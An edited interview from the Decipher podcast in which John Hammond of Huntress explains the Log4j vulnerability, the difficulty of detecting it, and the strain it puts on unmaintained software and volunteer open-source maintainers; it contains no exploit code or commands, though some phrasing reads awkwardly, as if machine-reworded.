Questions and Answers: John Hammond | Decipher



Huntress’s John Hammond joined Dennis Fisher on the Decipher podcast this week to discuss the Apache Log4j vulnerability. This is an edited and condensed copy of this interview.

Dennis Fisher: What was your first reaction when you read the advice and somehow the fear dawned on you?

John Hammond: You hit the nail on the head and this log4j package is ubiquitous. It is everywhere. So it’s a Java logging package, which means that every time an application tries to record some type of activity, or what happens when a user interacts or intervenes with the program, it logs it. It remembers that. The gimmick is that this Log4j library has added some extra functionality. The flaw and vulnerability that we are all screaming about, walking around like chickens with their heads cut off, is that this will analyze the data in this log file and take action on the input and input. That means, hey, it could reach code and actually execute it. It could call an outside host that is serving a malicious payload and allow a malicious actor to remote code execution so it can detonate and really do whatever it wants. Honestly, that opens the door. It is the first access. But that could then lead to privilege escalation, post-exploitation, exfiltration, persistence, sideways movement and everything else.

Dennis Fisher: As I understand it, it can be exploited with just one line of code. There isn’t much in it.

John Hammond: That is absolutely correct. So I tried to scream and scream about it to raise awareness as much as possible. I have some kind of video demonstration. I have a walkthrough and video on my own YouTube channel showing how this can be so easily exploited in Minecraft, the silly kid’s game. That’s where I think it explodes. In all honesty it is very difficult to validate and check what is vulnerable and where because this package could incorporate this logging functionality into every aspect of a program and that is the sinister thing about this vulnerability and that, yes, it sure is a zero day, but other security researchers have compared this to a zero day cluster bomb and there are so many different uses and the hard part is figuring out where and you can’t just leave out the filenames or, hey, we see the presence of Log4j, the class files , the jar files as they have their own false positive and false negative results. Hey, the version may not be correct. It may not be used in some fragments of the program and application you are looking at. Really the best way to find out is what I consider vulnerable to be, by trying a payload and see if you can see the connection and see that the callback is dangerous.

Dennis Fisher: I’ve looked at a lot of security vendors and technology vendors in general and looked at their websites to see what the updates are and you can almost see people saying we don’t think product is vulnerable and then updates 45 minutes later, it’s vulnerable.

John Hammond: I think people have compared this to Shellshock, another vulnerability with an absolutely huge attack surface that is not dead. They know it didn’t fall by the wayside and I think this log4j vulnerability, while we’re screaming about it and are on fire right now, we’re very, very up front. We shall see this continue this week, possibly next month, months after that, perhaps years. I honestly don’t know. There is a very real possibility that software packages and code that are no longer maintained, out of date software applications that are simply dead will not result in a software patch or fix being pushed forward, and while we are end users or asset administrators, IT practitioners, of course we could try and update, we could patch and update to the latest version of Log4j, we could make these changes as best we can. However, the software and the vulnerabilities are the applications that are provided by vendors or other vendors that we are practically sitting on. It’s impossible to wait for them to push these updates downstream and I don’t know how long that will take.

Dennis Fisher: I am also wondering about the whole open source ecosystem because you mentioned that there are likely some dead applications that are no longer serviced, or there is the other side of this coin where all of these open- Source projects are maintained, but it’s one person or two and they may not have the wherewithal to do this and get a patch out quickly. You likely have day jobs. You probably have other things to do.

John Hammond: Oh absolutely and that’s why we’re screaming about this thing, right? Because that’s why we make a big stink of it, because it’s such a big deal, but we’re trying to raise awareness that we’re trying to raise. We try to hold the entire community and the industry accountable. This is absolutely difficult to swallow, but it has to be done. This is how we react. This is how we relax. I’m really glad you mentioned some kind of open source software developer’s perspective because the application itself is an open source utility put together by some of the people who make the software. Voluntary work. They know that they do it for love. It’s a passion. It is something they do in their spare time and in their spare time while doing a normal job.

“We know this attack is trivial to pull together and carry out. It’s a single line of text.”



About Author

Comments are closed.